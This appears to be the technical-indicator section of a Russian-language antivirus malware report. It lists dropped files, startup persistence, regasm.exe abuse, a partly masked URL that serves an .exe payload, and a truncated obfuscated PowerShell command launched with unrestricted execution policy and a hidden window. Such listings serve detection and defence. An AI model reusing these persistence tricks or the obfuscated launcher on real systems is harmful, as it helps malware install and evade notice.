Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\5jrrwzvh.url
- 'C:\users\public\gqt.exe'
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- C:\users\public\gqt.exe
- %APPDATA%\panther\dv08r3ng.vbs
- %APPDATA%\panther\rdpsauachelper.exe
- http://fu###.#eadyfreights.com/youuth.exe
- DNS ASK fu###.#eadyfreights.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted -Window 1 [void] $null;$eosbzmhlyx = Get-Random -Min 3 -Max 4;$guylbonzvxs = ([char[]]([char]97..[char]122));$fgjyxli = -join ($guylbonzvxs | Get-Random -Count $eo...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'